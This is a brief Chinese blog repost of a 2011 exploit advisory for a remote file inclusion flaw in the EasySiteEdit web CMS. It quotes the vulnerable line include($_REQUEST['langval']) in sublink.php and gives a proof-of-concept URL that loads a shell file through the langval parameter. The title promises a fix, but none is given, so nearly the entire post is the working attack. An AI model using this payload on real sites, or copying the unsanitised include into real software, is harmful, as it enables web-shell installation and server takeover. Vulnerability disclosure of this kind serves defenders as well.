EasySiteEdit远程文件包含缺陷及修复

分类:安全 | 2011-08-22 | 撸过 69 次
0人扯谈

Exploit Title: EasySiteEdit remote file include
作者:koskesh jakesh
下载地址: http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip
# Tested on: linux
——————————-
vul:sublink.php
line 20:
include($_REQUEST[‘langval’]);
——————————-
测试:
http://webshell.cc/path/sublink.php?langval=shell.txt?

本站内容均为原创,转载请务必保留署名与链接!
EasySiteEdit远程文件包含缺陷及修复:https://www.webshell.cc/769.html

随机日志